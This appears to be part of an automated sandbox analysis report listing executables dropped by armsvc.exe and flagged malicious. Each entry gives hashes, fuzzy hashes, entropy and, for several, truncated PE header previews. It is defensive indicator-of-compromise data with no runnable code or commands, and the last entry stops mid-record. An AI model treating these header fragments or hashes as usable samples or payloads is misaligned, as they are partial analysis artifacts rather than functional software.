SHA-512:1363BCBA1EED620184BE43EFA2BD3F4B79FEA11CDCD54761EAEB90F8D388DF846C396B29A3AF1907695B84D4853047E17321976FCA5B56465CA59D91FC1BF8F9
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1839616
Entropy (8bit):5.246005749317532
Encrypted:false
SSDEEP:24576:8+gkEdfh4Co2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:5gkE5SALNiXicJFFRGNzj3
MD5:314C1D2294F9EA70912D9DB4387FC797
SHA1:2ACEB24BAD7397B325450E619EA52AF5E6849302
SHA-256:59E7A1340382FD49DE3D788E8C35BAAE28248994D6FEABA4994FBD06261BE494
SHA-512:FE518B6690D9B6C372BED1629CDDFA580240507A84DBD17DCE12FAEDC7B0AAD9F6BBAA1945628F46868CB2307906EB9A7C5D68F1994720AC215699D4A30A3D92
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1532416
Entropy (8bit):7.089472753375162
Encrypted:false
SSDEEP:24576:bBpDRmi78gkPXlyo0Ghjr1/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:tNRmi78gkPX4o0GhjhLNiXicJFFRGNzb
MD5:027BBAE2D66E3A61C7211DE15C20C02E
SHA1:954C6A65426475DAE89344B5D882200FEB051B0E
SHA-256:6CF5C658D3C510C97ACECE7ED8E7AA8F53C1A742054EF539D971CB24A8F0AF4B
SHA-512:66806CD4A2E0D578E62613D6F4044FAEDA5436434256EC01DB01C0A57458E20141A425D80BCB76B2E142373126D9503AFDA37D0513A6F1DD2EBC4FBD58B29769
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1282048
Entropy (8bit):7.22000048740635
Encrypted:false
SSDEEP:24576:ELOS2oPPIXV2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:c/P5LNiXicJFFRGNzj3
MD5:930237237FDDCFAC3F5B0D9D38550956
SHA1:AD0225CBE82095495C30E8756CA7BABBB1652CB7
SHA-256:9EB74D68BE5CB8DDE07C6E3A01DC3FDA38526E20E3468FE3CCB40050B5146C39
SHA-512:F4671871DCA54BEF0C5F2964B6DE310589AF08AA5BE934EB3F59F67FE877CAD8EFF759762E983A5A63E1190B8ED55A8C2E5117B72280078A73ADAE35C87498FD
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1300992
Entropy (8bit):4.5288942976894075
Encrypted:false
SSDEEP:24576:eYg/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:wLNiXicJFFRGNzj3
MD5:9DF4954BD75A0ECFFB9817F3874B6BF6
SHA1:EC34E6A2AC618350659B7679E30204EE73AF127B
SHA-256:5378EB149719AF99C8104A46FEDE68F24A918AE517F6DF3A571727D04B55442F
SHA-512:2D029250E377C5D6210C2935242BB54269A1CB77900A99ED75EFBF33FCF6124F979C371DD32BAFDDEF422639AD10F68CDC03C4DED1A2E69879730F105FFE2E03
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1222656
Entropy (8bit):6.698843306440181
Encrypted:false
SSDEEP:24576:xtdzn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xtdTLNiXicJFFRGNzj3
MD5:B8A0F52455AEBEE5620BECE314FEEB17
SHA1:1356775DDA03E31E20C4068BA4F12633C4868245
SHA-256:883B2E976AF92B4EEE2754180B9E0132D3760AC54C20917EDDFA214F5A54CCD5
SHA-512:15B93CBE1B65955BFAACFA56AC76866959BE25A4414F7E81027A089EBABABD0DD1FE60139FA2DBC3D81B75411940FAC581654F7F93260F86D04936E34FD3A8D4
Malicious:true
Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@...................................._..... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1613312
                                                                                                                                                  Entropy (8bit):4.676581003461684
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:lvfiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:d/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:B2E78EF5436134D816274DF08D6DE63B
                                                                                                                                                  SHA1:528CB5AA9154AFE0EE202B57283FC5336FB17BB6
                                                                                                                                                  SHA-256:689466105E49E18600A29EE51804AB213B6D3EF7077DE37669E02D08765E220B
                                                                                                                                                  SHA-512:1608B8F2DDDB0CE0C7619CDA3BC30589AE469A4C62CE3472D6106C3174CFCA4324CCF51683098DB9B92DE1EA42E7A2D380EC672768343DAB4CA7452F4E5EFC7A
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@..............................#........... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...`...P......................@...................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1616896
                                                                                                                                                  Entropy (8bit):5.04354183114732
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:C5zhM1XSFy/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:YMskLNiXicJFFRGNzj3
                                                                                                                                                  MD5:B2AFA23B7A641C70CA29D8B11124F6E4
                                                                                                                                                  SHA1:3E3A514FB6D9F20C275CF8FF8566D86ECA40337E
                                                                                                                                                  SHA-256:7E571C5C7F047285362B40E4EE1E4119A4497E3D5D01912E1ABA179326DA8F18
                                                                                                                                                  SHA-512:278AE6AF17CF088CFA345FFC7CF74AE5BADAD772CDD072F490B0FB962CA7636F3629E513FF0A840B4777D9E638CFFC5448A5524D6EB47291E47A75BA6252ED14
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@..............................#......P.... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...`...0......................@...........................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4151808
                                                                                                                                                  Entropy (8bit):6.496760651755457
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:ftuUC0nNc/RcYHCY9AWWnUOqdHIEogMAYrukdUmSC+bXMZQU1QqpN7559LNiXico:fjEIa3HIEWOc5T7wRGpj3
                                                                                                                                                  MD5:0F8FC9A358083CAADBBBB7912FEF47C3
                                                                                                                                                  SHA1:74E658B8987111E97CB0CAE3C0F89B76E6F6B54C
                                                                                                                                                  SHA-256:349A7444295676944AA085B97DAA2124AEBE0F6332CE863EFFC4552884A71B42
                                                                                                                                                  SHA-512:4904DC1D88A5A0087FFD52051F6C3D8BB15126EC5C0F4FB2500F862183A9B7020AD2C601AD43C85992675A289E2ED2B9ADD127F1CD7876B1F3645D921C86B448
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):59941376
                                                                                                                                                  Entropy (8bit):7.999353919934817
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1572864:IQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:HXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                  MD5:CC050E1E622C717EA4067C27916E9BE4
                                                                                                                                                  SHA1:8229F591FD4724120D0FEA452246393B07353F51
                                                                                                                                                  SHA-256:46F18420DB74C9EA48DA7D50B7FABCB71AB50CF86DAC5CA3A13F9FD978D5537A
                                                                                                                                                  SHA-512:1CAD01BB05C96E0352E4B26CB8863F38C8FE3AAA14CC7FEE7B3398F9F3957D8AC541D1C5B4A7512515446B07BB7D3DF219089BC4B58724D9B1EFE01BAF672058
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......5..... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1335808
                                                                                                                                                  Entropy (8bit):4.5925875554258395
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:MWCiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:M1/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:D95035800FAB1B23481B34CB0A97B618
                                                                                                                                                  SHA1:AD2331DD9D4272195C19F7493243AD03E62EA73F
                                                                                                                                                  SHA-256:578544DF111182B74B26908B2649243FE3916BBF8A45707F44E71E42577065EC
                                                                                                                                                  SHA-512:5BC1E41E7536034EBB02D964981F96D0B79AF6983DF8967143CFE049D0EE0AC7C5DDD1259586437B33B81E5B105419E714B4BA1F9B2495A5230780382DCF690E
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................P............ .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...`..........................@...................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6210048
                                                                                                                                                  Entropy (8bit):6.384603542885844
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:PDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXN:onN9KfxLk6GEQTXsUKzNDY7wRGpj3
                                                                                                                                                  MD5:245F864C7B1DF5D2B18438E9315E5028
                                                                                                                                                  SHA1:275A02A9C7520747786BFB2D8EE7D7864619BD77
                                                                                                                                                  SHA-256:D3BE7F9321C6844DDB487094C650E4068C6C75F961710ACAA0AC39A0756D5997
                                                                                                                                                  SHA-512:9975A6CA45B8E45724A5FC7B83304D297740AE1A15822A51EA7C798EC50E86170B4EDF415A12721A82222BC4CE6234801DC0785F0853E8EFC137302200F73DD7
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......._... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1312768
                                                                                                                                                  Entropy (8bit):4.543813792275687
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:JoiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Ja/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:BACB1119FAE5E1E1C2C98882EA15F66E
                                                                                                                                                  SHA1:8434302800097EEF4A8BDDAAE2F253D0E5BB94A3
                                                                                                                                                  SHA-256:289BD5061BACBB38FAD4AC6B6B7430ACEEFE62F550B7EF0F995DDA34AA3F3866
                                                                                                                                                  SHA-512:1F7A6B8A21E2FB9E76E6D29E89A2553244FB5C2E4302DC6347797EBF736F5BBAC8529AAB3C916797919C1B5F771FAF439A89E0289F5D25242793A29B052AC916
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@.....................................b.... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...`...........h..............@...................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):12039168
                                                                                                                                                  Entropy (8bit):6.595653452819305
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:98304:Jb+MzPstUEHInwZ33RBk9DdhgJCudq1uVIyESYgKt7wRGpj3:FnPgTHIwZnRBk9DdhSUEVIXgKRF9
                                                                                                                                                  MD5:0BB5671DD6F19563D95FC684F7696486
                                                                                                                                                  SHA1:174016145E5405C311D29E2BAAEEDD90135E8429
                                                                                                                                                  SHA-256:7D862CE2F402240C3A09CF7D239941865C96FAFD70B6E94AA98BB5A78B6069A1
                                                                                                                                                  SHA-512:1FA82540E34EA04E32599E98B1A70017BECE22649DBDAFEACE8D77745B84683C51854CBDA63403BDF88307B293ECE4F0F86AA4E5847F419C1735EAA8ABC33B1A
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.....................................V.... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 1478144
Entropy (8bit): 4.826047714317898
Encrypted: false
SSDEEP: 24576:pg5FvCPcs9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ufHGLNiXicJFFRGNzj3
MD5: 0A186775CF557473E261B32E15556C56
SHA1: 5B6CA554B021C54BC9B9277B6BA525C9FBC0D048
SHA-256: EC5197558A74088496A04E271AA04B88CE3585E531EBDA28AE29AE1C3E4EF2D9
SHA-512: 5AD8390BFB8C94794C2CD6A84FD441DF1ABC4A968EFEDA16D6EC9CCA5074C4A48EE394B5D0EDCFC61B090BDEF441FE8B8748F626D3DF8E586C944847B25E0182
Malicious: true
Reputation: unknown
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 1339904
Entropy (8bit): 7.200171265633495
Encrypted: false
SSDEEP: 24576:gjKTIsAjFuvt9fmFthMaT5U8aChaeuv/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:gjI/mPh7TT79OLNiXicJFFRGNzj3
MD5: 447EDF386DCBEFC7BB3C73755F9D244D
SHA1: 49BD27A0E57F8AD3271C91AB05508CEB0FAC2F54
SHA-256: F18ECAED306B3E02E3F184BB8AAFECA4EAB41908A58592ED2723303A9C25CB0C
SHA-512: AC63938B0D1F0615E80C508E08D709419E2F66AE5E49250E9AAE8E7EE13A78E55AD35CBA8B17C711AAE7DE9151BBD415E082A651970079E1BAB4D938FF646D27
Malicious: true
Reputation: unknown
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1671168
Entropy (8bit): 5.004961343913047
Encrypted: false
SSDEEP: 24576:uGqVwCto1Om5WgL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:bZ1OmUILNiXicJFFRGNzj3
MD5: DCBC027CA9E8C526E6EB0DA34DD53ED1
SHA1: 5FDDFB306550304FB4DF88E939F304194C435376
SHA-256: 36976E591D62BDA0BB0CFA60D7D52E7484D76D63E3D4F11C0D31DD76CAE7B843
SHA-512: 8C40AB0C6200A63B221E19F0F805B49DE8D1C24063A69C1733D0E5233D1BF8494D0A266C8F98A68531CA038251F10AF27F36A1AEA179961EC15E235E8A8223B3
Malicious: true
Reputation: unknown
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1409024
Entropy (8bit): 4.686406931438888
Encrypted: false
SSDEEP: 24576:qWBWZ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:oLNiXicJFFRGNzj3
MD5: 7FF04FFF284749125B6AC03F37A3BC58
SHA1: 6900E3E84072F515060B7BEBFC1BB1AC79E4ED9E
SHA-256: 30D342C90F32CB41725B53E5C53594A7A6055F6B2F83AF7735CDBF4F3248B252
SHA-512: 846DBA4427A610B4AA5E49F633F916FC7521CAC367A22DA1D2C7AD6FB04E26EA4670D9C54C6107D1B3BD06AD327031EF306C4BA6A65B07A880891C81F654C3F8
Malicious: true
Reputation: unknown
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 1683968
Entropy (8bit): 7.221676640034297
Encrypted: false
SSDEEP: 49152:M+GtCi27mVdyT+a08LNiXicJFFRGNzj3:nmd2757wRGpj3
MD5: 4934B0E60A2C91D278D8D6A553E355EB
SHA1: 8B3F5ABC07C1B94E7D8A41CCDB7D4F08C9F54A55
SHA-256: 758FDA9C897AFB370A24EEB8339527509D05D819F9097B9C4359E7A7C9FFC827
SHA-512: B56E97044464EBAEF53CA2BF6056B7D55E6EA8BAE9AA7783B73E5F18A7CB86BAB4C8E2528752522AAFAF41341634999A9879042946A37320A7B77F21FCF5C9B2
Malicious: true
Reputation: unknown
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 3110912
Entropy (8bit): 6.6468730531563995
Encrypted: false
SSDEEP: 49152:dU198PzqkltcT0gViqNfBZQiOIK5Ns6YZ82PTJeYzLNiXicJFFRGNzj3:S9NfHOIK5Ns6qR9J7wRGpj3
MD5: 2B9B399931F73C11A631FC2927EE8708
SHA1: 8D8A6810539D2516F88B56875D98FEE1BA5D3454
SHA-256: 64458948814B3779F2C8A1C5C1C2DB226C39BB77E516E5763B98431E9FABE5FE
SHA-512: 97163E36784E1628BB0819C442429E4D5FD0B5785E077D29FCC0F4E6F116B8679A40410FDD680CFBB4987A2201F91F950D4651DBA9F545D1B3E68F23CE74FDDE
Malicious: true
Reputation: unknown
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1743872
Entropy (8bit): 5.136837613539101
Encrypted: false
SSDEEP: 24576:SkIWTUQcyd7/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:SxKU0LNiXicJFFRGNzj3
MD5: 09F33BBA838E10D79DBE8F075EBCD025
SHA1: 55B66C855BE8ADD22EDEB778685439CC9A220937
SHA-256: 39E8E51D9E4A25425B76851AF0324EE1BC7ED0FA0DD47C06A0882880F3F0666C
SHA-512: 577F5CAA7E7A54652A6C283CADC0A9271C1C645109BBC338D3E24521CF266C3B06B2098538D442F149CC586685DDF35AE4F956077ADC5A117B940C55484F9FCC
Malicious: true
Reputation: unknown
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1494016
Entropy (8bit): 4.896118193838053
Encrypted: false
SSDEEP: 24576:uO+qBM/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:R+fLNiXicJFFRGNzj3
MD5: DB3115A619F124BC7CBAA399F176B2C6
SHA1: 6D4A286418A6626A30BAA2EFBE71D019EB080030
SHA-256: 76C989A90A176C86DE7F0AF96D4D1B492D2FE10BBCF8378FB921AF7EA36E6785
SHA-512: 6FB33F6BC022DC9F2E0DDC870A36B37DA84AF1A7B4A7AC2D10030A6A975D86AC04425E500A9A025BECE14B54EFD6FF04A0A9DD6C236C771331D1AA840E4A0B4C
Malicious: true
Reputation: unknown
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1298944
Entropy (8bit): 4.521149518320879
Encrypted: false
SSDEEP: 12288:SiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:0/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5: E5E26322F9B578B09CDC8E8DEE068A86
SHA1: 12D7C105118DF5266ECEDED76D529D673C317DE3
SHA-256: 3827A5209D7437CE4C9F1E2A89A9B16321F2983EE218FFB23903A723800AD4BB
SHA-512: 1B9B45232458FB3B79384C7B98E9A61EA8D5D16112128BB508FBADAE69315CFF7CD58CFF4ADBA84F6AA76BD62F35ED4EEDC9269AE1A99D8D17188620FE7CD6A9
Malicious: true
Reputation: unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1317376
Entropy (8bit):4.55083767491033
Encrypted:false
SSDEEP:12288:4kiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:n/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:776F1520E05ED22E754CAB1AC4DB789C
SHA1:4391226DCB71006E952630B42F87631D1CCF6663
SHA-256:5FE6CFEBEA951A7A9EEBA4F8655E4320AE036F4D659FFA0C57DEFB8A386D49E8
SHA-512:4F0FF7DB6D6D45977C9DAF702F3D0859D3B9AEDBCAB386D08ED4A5A74F47C15E152209F31B2CD71CAA758DC6BBE33DC37CFC82B9A530F6C3BE0058FFCD4EDC0B
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4151808
Entropy (8bit):6.496759755138488
Encrypted:false
SSDEEP:49152:9tuUC0nNc/RcYHCY9AWWnUOqdHIEogMAYrukdUmSC+bXMZQU1QqpN7559LNiXico:9jEIa3HIEWOc5T7wRGpj3
MD5:C1B8662F8E5D3A6D1B0A0FBB4902D856
SHA1:EFC3437A7154810E5892E02AEEFEED623133272C
SHA-256:1A051B96AAF4E1787A6EA5348148B990806D8676CA657374344BB854031E941E
SHA-512:97B80B7CC862495CD8C581C7916E13368A522D33E4BFC354C597AAE20DAC781F1FB9B84E6A9537E009304853F34E083AFF8A740B4D0E476DCE196E41D9D93FDB
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):59941376
Entropy (8bit):7.999353919407271
Encrypted:true
SSDEEP:1572864:xQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:iXhwMhe6AABPiQwF6xQ22R
MD5:81E5B3991BCC82926EE45571AD5CCCF3
SHA1:7A9C944B9D31287EA721E85D0E6C02FA419B6F50
SHA-256:32C07AF8610E043BD05BF98FF4C4694C3E30D75A554BF0CC65CB23A116113490
SHA-512:4216FE15A3AB138B79F9C0502E853CC4EDAAE0FE1527B66905C987FAA5EF95B8B56A02A7F13966D0AE087EDF37BCD8FB3E43B2FF67899907952DFB63B499E50B
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1385984
Entropy (8bit):4.703444947922468
Encrypted:false
SSDEEP:24576:WjkYuY/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:e/uYLNiXicJFFRGNzj3
MD5:DB654B602A1E6417F51C3C1A058F1B38
SHA1:CF720B1E4082AD306E66375A6C153C843CD64706
SHA-256:FF4FB74473017D21BE9F5632F701F3F7886B05E779BF3C71F17493315018856F
SHA-512:47A4B7A0E472079FBBAA409E6AC52D8C6C058A8F8E91FCCA505E9730D8E985F9D2644D03A9A9BF60FA31741BAB411FFDAAC6F936B6DB44CEFBAEB6F6EBF60BF7
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1540608
Entropy (8bit):4.935002381096148
Encrypted:false
SSDEEP:24576:yxwSJzkrmZsE/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:yyIkrKsELNiXicJFFRGNzj3
MD5:FDA2B78DF59DE59D497FB22336CF3527
SHA1:8D5DADD5C0B9FB0DDBE40F08658653F852336FFB
SHA-256:A2AA1E705434DF09A538C1A96DBEF025319DC924548C21C245F88CEFF4FE489B
